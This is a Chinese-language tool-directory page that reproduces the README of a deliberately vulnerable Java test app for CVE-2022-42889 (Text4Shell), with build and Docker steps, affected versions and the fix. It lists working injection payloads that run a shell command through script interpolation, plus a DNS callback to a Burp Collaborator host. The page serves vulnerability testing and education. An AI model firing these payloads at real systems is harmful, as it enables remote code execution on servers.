Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
text4shell-poc — 用于测试CVE-2022-42889的概念验证应用程序 | Kitploit
工具/GitHubGitHub/securekomodo/text4shell-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubsecurekomodo/text4shell-poc

text4shell-poc

用于测试CVE-2022-42889的概念验证应用程序

查看仓库
81113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-42889 PoC 测试应用程序

这是一个易受攻击的应用程序,作为漏洞 CVE-2022-42889 的概念验证而开发。

Maven 安装

为了运行此程序,你需要:

  • JDK 17 或更高版本
  • Maven
  1. 克隆 Git 仓库
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. 使用 Maven 安装以创建 JAR 文件
root@kitploit:~
mvn clean install

这将在 ./target 文件夹中创建 JAR 文件 text4shell-poc-0.0.1-SNAPSHOT.jar

  1. 启动 Web 服务器
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

这将在默认端口 8080 上的 localhost 启动一个 Web 服务器

  1. 浏览到 Web 服务器

访问 http://localhost:8080/,你应该看到以下输出

root@kitploit:~
Text4Shell POC Test -@securekomodo
将 payload 发送到 /reflected?poc=yourpayload
或将 payload 作为 userAgent 发送到 /blind
  1. 手动利用或使用 text4shell-scan 进行扫描

示例利用 Payload

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

推荐的 URL 编码器用于成功演示利用: https://www.urlencoder.org/.

Docker

或者,你可以使用 Docker 来运行此 PoC:

  1. 克隆 Git 仓库
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker 构建
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker 运行
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. 测试易受攻击的应用程序
root@kitploit:~
http://localhost/
  1. 攻击可以通过传递字符串 “${prefix:name}” 来执行,如下所示:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

推荐的 URL 编码器用于成功演示利用: https://www.urlencoder.org/.

或者,你可以验证扫描工具(如 text4shell-scan)的有效性

你易受攻击吗?

为了使你的代码易受攻击,你需要:

  • 运行 Apache commons-text 的版本从 1.5.0 到(不包括)1.10.0
  • 在 StringSubstituion 中使用插值(参见 https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html)— 请注意,这并不常见

修复方法

修复方法是将你的 commons-text 实例更新到 1.10.0 或更高版本。

作者

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
下载工具